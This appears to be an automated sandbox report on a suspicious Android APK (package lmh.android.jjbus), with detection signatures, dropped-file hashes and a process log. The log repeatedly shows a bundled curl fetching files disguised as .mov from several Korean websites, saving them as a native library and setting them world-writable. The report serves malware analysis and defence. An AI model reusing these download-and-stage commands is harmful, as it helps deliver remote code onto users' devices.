bed3e665d2b5fd53aab19b8a62035a5d9b169817adca8dfb158e3baf71140ceb

Analysis

max time kernel
189777s
max time network
163s
platform
android_x86
resource
android-x86-arm-20220823-en
resource tags

androidarch:armarch:x86image:android-x86-arm-20220823-enlocale:en-usos:android-9-x86system
submitted
11-05-2023 14:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bed3e665d2b5fd53aab19b8a62035a5d9b169817adca8dfb158e3baf71140ceb.apk
Size

6.9MB
MD5

de8f8f4eabb456fabb28bae35086a18b
SHA1

968d978a134179093ce75e6a90ebdbed9bc3bcf8
SHA256

bed3e665d2b5fd53aab19b8a62035a5d9b169817adca8dfb158e3baf71140ceb
SHA512

64da98e75d4684a7cebaf26eb41322e11acdfc0114750e2abb09a5162f880a46f6f527fc8000e60b66c0425d55d409b1a2366d763516233c3030742274062c01
SSDEEP

98304:mAet1rE4VBEeKUvUh2VWRjxsSBMJKB6Da+cRsAchoKfsIXiqf/kN0cDEuUxyd5Vd:mpDIbc+Y2OdtoSil0cDEuUxydmIdR

Score

6^/10

evasion

Malware Config

Signatures

Reads information about phone network operator.

Removes a system notification. 1 IoCs

evasion

description	ioc	Process
Framework service call	android.app.INotificationManager.cancelNotificationWithTag	lmh.android.jjbus

lmh.android.jjbus
1⤵
- Removes a system notification.
PID:4194

sh -c chmod 777 /data/data/lmh.android.jjbus/curl
1⤵
PID:4503

chmod 777 /data/data/lmh.android.jjbus/curl
1⤵
PID:4503

sh -c /data/data/lmh.android.jjbus/curl http://hferry.co.kr/data/fckeditor/media/image.mov /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4564

/system/bin/ndk_translation_program_runner_binfmt_misc /data/data/lmh.android.jjbus/curl /data/data/lmh.android.jjbus/curl http://hferry.co.kr/data/fckeditor/media/image.mov /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4564

sh -c chmod 777 /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4605

chmod 777 /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4605

sh -c /data/data/lmh.android.jjbus/curl http://img.kindermom.co.kr/frameart/detail/header.mov /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4712

/system/bin/ndk_translation_program_runner_binfmt_misc /data/data/lmh.android.jjbus/curl /data/data/lmh.android.jjbus/curl http://img.kindermom.co.kr/frameart/detail/header.mov /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4712

sh -c chmod 777 /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4737

chmod 777 /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4737

sh -c /data/data/lmh.android.jjbus/curl http://www.yongmooncamp.or.kr/image/file/LogOff.mov /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4770

/system/bin/ndk_translation_program_runner_binfmt_misc /data/data/lmh.android.jjbus/curl /data/data/lmh.android.jjbus/curl http://www.yongmooncamp.or.kr/image/file/LogOff.mov /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4770

sh -c chmod 777 /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4795

chmod 777 /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4795

sh -c /data/data/lmh.android.jjbus/curl http://hferry.co.kr/data/fckeditor/media/image.mov /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4853

/system/bin/ndk_translation_program_runner_binfmt_misc /data/data/lmh.android.jjbus/curl /data/data/lmh.android.jjbus/curl http://hferry.co.kr/data/fckeditor/media/image.mov /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4853

sh -c chmod 777 /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4878

chmod 777 /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4878

sh -c /data/data/lmh.android.jjbus/curl http://img.kindermom.co.kr/frameart/detail/header.mov /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4905

/system/bin/ndk_translation_program_runner_binfmt_misc /data/data/lmh.android.jjbus/curl /data/data/lmh.android.jjbus/curl http://img.kindermom.co.kr/frameart/detail/header.mov /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4905

sh -c chmod 777 /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4932

chmod 777 /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4932

sh -c /data/data/lmh.android.jjbus/curl http://www.yongmooncamp.or.kr/image/file/LogOff.mov /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4960

/system/bin/ndk_translation_program_runner_binfmt_misc /data/data/lmh.android.jjbus/curl /data/data/lmh.android.jjbus/curl http://www.yongmooncamp.or.kr/image/file/LogOff.mov /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4960

sh -c chmod 777 /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4987

chmod 777 /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:4987

sh -c /data/data/lmh.android.jjbus/curl http://hferry.co.kr/data/fckeditor/media/image.mov /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:5016

/system/bin/ndk_translation_program_runner_binfmt_misc /data/data/lmh.android.jjbus/curl /data/data/lmh.android.jjbus/curl http://hferry.co.kr/data/fckeditor/media/image.mov /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:5016

sh -c chmod 777 /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:5040

chmod 777 /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:5040

sh -c /data/data/lmh.android.jjbus/curl http://img.kindermom.co.kr/frameart/detail/header.mov /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:5066

/system/bin/ndk_translation_program_runner_binfmt_misc /data/data/lmh.android.jjbus/curl /data/data/lmh.android.jjbus/curl http://img.kindermom.co.kr/frameart/detail/header.mov /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:5066

sh -c chmod 777 /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:5092

chmod 777 /data/data/lmh.android.jjbus/libSound1.1.so
1⤵
PID:5092

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/data/user/0/lmh.android.jjbus/app_webview/GPUCache/index

Filesize
20B

MD5
93027d42b314432c4216e6cfca48b384

SHA1
43448dd8102979c3926828182579691945eedd4e

SHA256
3cda72e67c62e52a342309c44f2cb3b6c1019c7b11822e2f628e48e254e2b41c

SHA512
a52d13cf7f5be196d1e2f135b8a010f80558c5d35e90e7792441d1c976517d55cf1c9587949db69ebef294cc6ef79529a65e7d779964793016efecacd152f70e

Download Submit
/data/user/0/lmh.android.jjbus/app_webview/GPUCache/index-dir/temp-index

Filesize
48B

MD5
4fc788ab22a113d312cea157bd352431

SHA1
7441e8bf3214aca117f6b051a7bfd467b4fd9fce

SHA256
a4d6baec61a8cb8ab98091413a8af2f762cf48882e3587df4c594a5a57752171

SHA512
1ca96dc72211871e87d477057e54645699ffd52b2c0fdd93755ba4bbb4251574f73cb6a6a6ec24094c465ef4244d41dfd4816ae434dd318412b52eb413fa7739

Download Submit
/data/user/0/lmh.android.jjbus/app_webview/Web Data

Filesize
104KB

MD5
dc79f9ce5f3ab5270b33e61119dfc959

SHA1
1844bf222a5144b513dcf2fb50a18c011701c647

SHA256
47e65f4de08deabfd52ecdb8b0a29c61c482188b92c36182e2112ca0a8f4ff65

SHA512
18b8894a7f35df516f423bbdebf1e05ce09eaf4345b139e59e603cadb81f8d1fa20f793438c28e8fd9a64e64f0684223d90ce6f10d3f93cb0c781049a8cff03e

Download Submit
/data/user/0/lmh.android.jjbus/app_webview/Web Data-journal

Filesize
1KB

MD5
90492047c5c68dd6684b54d8a4373e1a

SHA1
f935b241f7ef0a53be5988368f3deba3c33f7a48

SHA256
319d56da365c4b19dafb85adfdd1c0152b8fbecc801ddcc9705e645934c4fb56

SHA512
89cdd0cacce1ec22dd800da46eb854e95cea9a7d996c1d21f195b71e52342f17c33f8a4e9467ec2b40b0d8e2e3bf7bbed83ccb15cb43496a1e489281784db5a4

Download Submit
/data/user/0/lmh.android.jjbus/app_webview/metrics_guid

Filesize
36B

MD5
a6f78f6acf7c46e3514873a6751faaba

SHA1
4823171bfba273d34837d5751ede1b01feabdbde

SHA256
b6a82dcbcfa297f569406aa9afdef38b8c11ea3ddeebb41ecf50773cd4eaafea

SHA512
952eb385d4bdb328fd04b5fc548572400134fd7f5a68cf8fb98260ef4d9d4a748f6ac310c67055ad7c15cd5a20326de9f57784468a53e906e150c2349620be19

Download Submit
/data/user/0/lmh.android.jjbus/databases/customer_info.sqlite

Filesize
4KB

MD5
bb48455d8cc25065a4287add038ec68f

SHA1
a3dd2c6c5a2fe2e2587ebc2582b3eb912fe49888

SHA256
7d266f7654c44c5ebebd6b9871c4d39f344cc16d8588cdcd6540f2ec78b5f383

SHA512
3079acbab78616abaf85665b9955e9bee4afc63c2fe6a9d4cc3bd0c5001f9ca47b0192feb32291c79fb271b7ea304860e7c6b6f5227e65af5eab2ae314fa5dd4

Download Submit
/data/user/0/lmh.android.jjbus/databases/customer_info.sqlite-journal

Filesize
1KB

MD5
8c01c8a7082ffec36e414df7fd203c65

SHA1
8bbde45505c0f653a1074b8eaef1d43d764d4ad9

SHA256
5515a6f94ae546898a62c4515a85ff9f96ac2846b96675424f628cdd91ff44ab

SHA512
da77a3908558602c59a0a6c4560c8b02a3e410e3271454639c13c70b6ac77954fd59b955123277047cef3ec37bc42406c76d15c8f46e54d41948f93f56a5c39d

Download Submit
/data/user/0/lmh.android.jjbus/databases/customer_info.sqlite-shm

Filesize
8B

MD5
7dea362b3fac8e00956a4952a3d4f474

SHA1
05fe405753166f125559e7c9ac558654f107c7e9

SHA256
af5570f5a1810b7af78caf4bc70a660f0df51e42baf91d4de5b2328de0e83dfc

SHA512
1b7409ccf0d5a34d3a77eaabfa9fe27427655be9297127ee9522aa1bf4046d4f945983678169cb1a7348edcac47ef0d9e2c924130e5bcc5f0d94937852c42f1b

Download Submit
/data/user/0/lmh.android.jjbus/databases/customer_info.sqlite-shm

Filesize
8B

MD5
7dea362b3fac8e00956a4952a3d4f474

SHA1
05fe405753166f125559e7c9ac558654f107c7e9

SHA256
af5570f5a1810b7af78caf4bc70a660f0df51e42baf91d4de5b2328de0e83dfc

SHA512
1b7409ccf0d5a34d3a77eaabfa9fe27427655be9297127ee9522aa1bf4046d4f945983678169cb1a7348edcac47ef0d9e2c924130e5bcc5f0d94937852c42f1b

Download Submit
/data/user/0/lmh.android.jjbus/databases/customer_info.sqlite-shm

Filesize
8B

MD5
7dea362b3fac8e00956a4952a3d4f474

SHA1
05fe405753166f125559e7c9ac558654f107c7e9

SHA256
af5570f5a1810b7af78caf4bc70a660f0df51e42baf91d4de5b2328de0e83dfc

SHA512
1b7409ccf0d5a34d3a77eaabfa9fe27427655be9297127ee9522aa1bf4046d4f945983678169cb1a7348edcac47ef0d9e2c924130e5bcc5f0d94937852c42f1b

Download Submit
/data/user/0/lmh.android.jjbus/databases/customer_info.sqlite-shm

Filesize
8B

MD5
7dea362b3fac8e00956a4952a3d4f474

SHA1
05fe405753166f125559e7c9ac558654f107c7e9

SHA256
af5570f5a1810b7af78caf4bc70a660f0df51e42baf91d4de5b2328de0e83dfc

SHA512
1b7409ccf0d5a34d3a77eaabfa9fe27427655be9297127ee9522aa1bf4046d4f945983678169cb1a7348edcac47ef0d9e2c924130e5bcc5f0d94937852c42f1b

Download Submit
/data/user/0/lmh.android.jjbus/databases/customer_info.sqlite-wal

Filesize
4KB

MD5
d96e83b28b0d59f53a1e7a6664e6716b

SHA1
af3039b6bc213bec33f714acd5df43248dcc0569

SHA256
8dadf0f34d962ed04c521c8af3933a90e5fc049ed5cdd035033812a25476566d

SHA512
3f68e63a10ba351bd898ec0ba230c2b6222492ea2600ece2771f36512fd1de23ff6d88195efec1f97afc2ed6e2fc9043cb8a69f2502564048b3f7a9210c04993

Download Submit
/data/user/0/lmh.android.jjbus/databases/customer_info.sqlite-wal

Filesize
1KB

MD5
de457eff508292d539e8a44987ca0fc4

SHA1
6970962f95aaaa2f8d9bd1077e939fb0d4ac9a97

SHA256
2a2517ee433ccab21bcb7df294549a7eddd2dab92585dc0697f87c9b1bd50fa7

SHA512
85866b523cb11b083f10101dba586fc17a3379b142b9e5c5e1ac80b0a03c7d04a190c7a1eaee475bcbd7ef1651d85c27ed7ad280db521a4be607dcd00341957f

Download Submit
/data/user/0/lmh.android.jjbus/databases/google_analytics_v4.db

Filesize
4KB

MD5
f2b4b0190b9f384ca885f0c8c9b14700

SHA1
934ff2646757b5b6e7f20f6a0aa76c7f995d9361

SHA256
0a8ffb6b327963558716e87db8946016d143e39f895fa1b43e95ba7032ce2514

SHA512
ec12685fc0d60526eed4d38820aad95611f3e93ae372be5a57142d8e8a1ba17e6e5dfe381a4e1365dddc0b363c9c40daaffdc1245bd515fddac69bf1abacd7f1

Download Submit
/data/user/0/lmh.android.jjbus/databases/google_analytics_v4.db-journal

Filesize
524B

MD5
585bad14800545c1cd7976d097b4fab9

SHA1
488020e47974b3a8efc0a44838aac6f9b31ec8d4

SHA256
ca50b2e7f2d2fd9bfeb6b6496d50343afab779afe2d713e2b8cc920719d56849

SHA512
cc36a7fdd080df3cdde29b29539ffa3b3a3bcaa7861541444aefef3f4d5622ddffb10df8bdcb7bcd93436485364ce085a5922d597d1befdbe117f88e93625ee9

Download Submit
/data/user/0/lmh.android.jjbus/databases/google_analytics_v4.db-shm

Filesize
8B

MD5
7dea362b3fac8e00956a4952a3d4f474

SHA1
05fe405753166f125559e7c9ac558654f107c7e9

SHA256
af5570f5a1810b7af78caf4bc70a660f0df51e42baf91d4de5b2328de0e83dfc

SHA512
1b7409ccf0d5a34d3a77eaabfa9fe27427655be9297127ee9522aa1bf4046d4f945983678169cb1a7348edcac47ef0d9e2c924130e5bcc5f0d94937852c42f1b

Download Submit
/data/user/0/lmh.android.jjbus/databases/google_analytics_v4.db-wal

Filesize
84KB

MD5
3c5262decc9a84440d75235e5bf61d62

SHA1
c4767fc53e58344e34c198d8ffa5baf12eafae6d

SHA256
caed93c6c173146610641b66d07ad68a91a9c107611dbe46d12ebc26ccb88536

SHA512
b7a2ebba1740df86da9a06edd3f068104d9513b423e220f284298a037b37aef390d603cf5444ed9ab9a3bd84d5a92cc78f4837d7b44311751943e4359467f7b0

Download Submit
/data/user/0/lmh.android.jjbus/databases/update.splite

Filesize
3KB

MD5
5903465d6e035f40f396911361e0f7ba

SHA1
de79e3673602a721c712a099dedb61f3a5950f7a

SHA256
ebbcda396589afaf359172af057aa664c7e3e56fb4862211c6f04df6acb65532

SHA512
b62fdde04d1950d18cca437b833937933087c3e39338f5fe968c5f582fbdbae7ab7299a143ad2a85f38b8fa396055e04f048d2677a12da0bde82f63040336d45

Download Submit
/data/user/0/lmh.android.jjbus/files/com.adlibr/image/1979924498.tmp

Filesize
2KB

MD5
61e7bb9867dc6e5a98252189b970c1b6

SHA1
c49f812511c0d818d7606cf5a62c5f48af27664f

SHA256
45197a7845ae47040cafb4c475c9cf00ba10890361abce36472ee362eff8d66e

SHA512
cae70154632f4f7b6e4f68267f376ee9d5016d348ea5212d692138a0211e9c72b49c315b0b22141375ebdc0ec45c1ebe35752e2b19e071a74f8312f31f9ddf96

Download Submit
/data/user/0/lmh.android.jjbus/files/gaClientId

Filesize
36B

MD5
2f4e8a0450d897f8910efc6e6b264dc6

SHA1
0578bd3297c4bc8da9553e5ebb8bf43ca395554c

SHA256
5e2e4b719d7849ada627cd91a3682ffa9a4cfcd4def1f371b555d0ae29a1071e

SHA512
164c68d02a06fd7762678210bd0394a0c8848bc8c9c207abdb835e98c201e69966acdb1af094aa89cbf09996d412102cdad1434c1d6f8b48f6aeb2abf82371c9

Download Submit
/data/user/0/lmh.android.jjbus/files/gaClientIdData

Filesize
32B

MD5
ccef01e575cce84f7c932e1d7d68901b

SHA1
871ae1439e6dc0a745c7e9ff59b55116556c2a33

SHA256
6e0689ca39620efa7d4f54feb42c706d3aa9c3b448154598821711bc7cd0148d

SHA512
9bb723c6188b88daa09e19e4ba08cc6bed9ccfee7fe4b0988dd6592b1f90c217ad300def3312868ad36b0717b9b920f26671bc1b602029203be3799425a03986

Download Submit
/data/user/0/lmh.android.jjbus/shared_prefs/WebViewChromiumPrefs.xml

Filesize
127B

MD5
21223e9184445fe043476484cd8cb1f9

SHA1
2b4813f849121d60ba35eb0889080668bb62c778

SHA256
bb61b7c087c2ae2de93a7740ff75707342940557146366e92b840284cd9446af

SHA512
be21408de0cc643650e5d9ab9057a8f9de88e37fbdc6417cfeba160402ec4cd14fccbc82cbbfd941ecfc0bb3d4056ee61ac199efdc99d647d53e65818835fd48

Download Submit
/data/user/0/lmh.android.jjbus/shared_prefs/com.google.android.gms.analytics.prefs.xml

Filesize
129B

MD5
e5ae2dcc17a6fe3fc6174b3c34f554f0

SHA1
1e88c11eb1989e67c0f4e127c68feacbe69f035d

SHA256
5d1de33147c5acc2ac6b6c42f8489ba2e10ddd3725b76b908e66e38ee8ac6f97

SHA512
00ea201e2ba61707f009a014bc1bde930700734c61f2b9d1c83014b29ba9eb4f202ff7de820ffe25927aeae5be201dfecb861def7fad9e274ea5d791b161f728

Download Submit
/data/user/0/lmh.android.jjbus/shared_prefs/com.google.android.gms.analytics.prefs.xml

Filesize
454B

MD5
19bd3b8574e45eadf0f40fb3089ecd62

SHA1
004aad61fc892bad4127c41a7914fc255b5d8743

SHA256
88bbdd0c99ac5129656feeb73cecbd6d101c8979e17f31e1e2397f344c7ce4f3

SHA512
02f57c3059df6abbd4e352f26d65d6c653cac5adeb78b4ba73f461c6a78278caba0b75f0b4ba96b4cc72a80e7ebdc8ef66cceb818a94f18e491b88d802e338fe

Download Submit
/data/user/0/lmh.android.jjbus/shared_prefs/com.google.android.gms.analytics.prefs.xml

Filesize
418B

MD5
7381e8a9b355ac492e5f1079821c3023

SHA1
6f7d4855746c948bd9d5de04abbf206e5d322d28

SHA256
82199332121bc9b599175261ca8bb41a4bdbb33e85147656a9c0ff0b5baf3364

SHA512
6edb34e5169ddd05a16f1b72c9e53ebb62692ad51b8a21b6379e205296a98de11b8e8d4c202c38c7185bbecd4ab30b0e71d30d902916d2999c85c5754775d747

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads